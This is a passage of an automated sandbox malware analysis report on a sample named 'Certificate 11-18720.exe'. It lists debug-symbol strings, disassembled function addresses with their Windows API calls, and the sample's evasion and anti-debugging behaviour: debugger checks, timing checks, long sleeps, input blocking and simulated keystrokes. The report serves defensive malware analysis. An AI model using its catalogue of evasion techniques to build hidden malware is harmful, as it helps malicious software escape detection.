            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4134504423.000000000010E000.00000002.00000001.01000000.00000004.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1921834218.000000000010E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-18720.exe, 00000000.00000003.1702615943.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-18720.exe, 00000000.00000003.1692848503.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753265226.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750496212.0000000003400000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1851937705.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1849505251.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-18720.exe, 00000000.00000003.1702615943.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-18720.exe, 00000000.00000003.1692848503.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1849589393.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753265226.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750496212.0000000003400000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1851937705.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1849505251.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1849473855.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818437081.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135049667.0000000000A58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4136427268.000000000332C000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2139095510.000000003449C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4136427268.000000000332C000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2139095510.000000003449C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1849473855.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818437081.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135049667.0000000000A58000.00000004.00000020.00020000.00000000.sdmp
            Source: Certificate 11-18720.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Certificate 11-18720.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Certificate 11-18720.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Certificate 11-18720.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Certificate 11-18720.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005DE01E LoadLibraryA,GetProcAddress, 0_2_005DE01E
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005EC09E push esi; ret 0_2_005EC0A0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005EC187 push edi; ret 0_2_005EC189
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0062C8BC push esi; ret 0_2_0062C8BE
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005E6B05 push ecx; ret 0_2_005E6B18
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0062EEB4 push B70F0000h; retf 0_2_0062EEC7
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0060B2B1 push FFFFFF8Bh; iretd 0_2_0060B2B3
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005EBDAA push edi; ret 0_2_005EBDAC
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005EBEC3 push esi; ret 0_2_005EBEC5
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_00F47A70 push ebx; ret 0_2_00F47A7F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004048A9 push esp; ret 1_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E2BA push 00000038h; iretd 1_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A436 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418C92 pushad ; retf 1_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A5D9 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004017E5 push ebp; retf 003Fh 1_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403780 push eax; ret 1_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004147A2 push es; iretd 1_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0380225F pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038027FA pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx 1_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0380283D push eax; iretd 1_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03801368 push eax; iretd 1_2_03801369
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Code function: 2_2_05C6F5A8 push ebx; iretd 2_2_05C6F772
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Code function: 2_2_05C7342C push 00000038h; iretd 2_2_05C73430
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Code function: 2_2_05C787EA push FFFFFFBAh; ret 2_2_05C787EC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Code function: 2_2_05C6D79E push ebx; ret 2_2_05C6D79F
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Code function: 2_2_05C6F74B push ebx; iretd 2_2_05C6F772
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Code function: 2_2_05C6DE04 pushad ; retf 2_2_05C6DE05
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Code function: 2_2_05C59A1B push esp; ret 2_2_05C59A1C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02D0225F pushad ; ret 3_2_02D027F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02D027FA pushad ; ret 3_2_02D027F9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_00628111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00628111
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005DEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_005DEB42
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005E123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_005E123A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Certificate 11-18720.exeAPI/Special instruction interceptor: Address: F4724C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 839Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9133Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeEvaded block: after key decisiongraph_0-93711
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeEvaded block: after key decisiongraph_0-92633
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6812Thread sleep count: 839 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6812Thread sleep time: -1678000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6812Thread sleep count: 9133 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6812Thread sleep time: -18266000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe TID: 6496Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe TID: 6496Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe TID: 6496Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00606CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00606CA9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006060DD
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006063F9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0060EB60
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060F56F FindFirstFileW,FindClose,0_2_0060F56F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0060F5FA
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00611B2F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00611C8A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00611F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0046BAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_0046BAB0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005DDDC0
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
            Source: firefox.exe, 00000008.00000002.2140440681.000001C7344AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}a
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135286737.00000000005B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe API call chain: ExitProcess graph end node graph_0-92756
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417823 LdrLoadDll,1_2_00417823
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00616AAF BlockInput,0_2_00616AAF
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005C3D19
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_005F3920
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DE01E LoadLibraryA,GetProcAddress,0_2_005DE01E
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F474B8 mov eax, dword ptr fs:[00000030h]0_2_00F474B8
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F47518 mov eax, dword ptr fs:[00000030h]0_2_00F47518
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F45E58 mov eax, dword ptr fs:[00000030h]0_2_00F45E58
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h]1_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h]1_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038663FF mov eax, dword ptr fs:[00000030h]1_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h]1_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h]1_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h]1_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h]1_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390634F mov eax, dword ptr fs:[00000030h]1_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D437C mov eax, dword ptr fs:[00000030h]1_2_038D437C
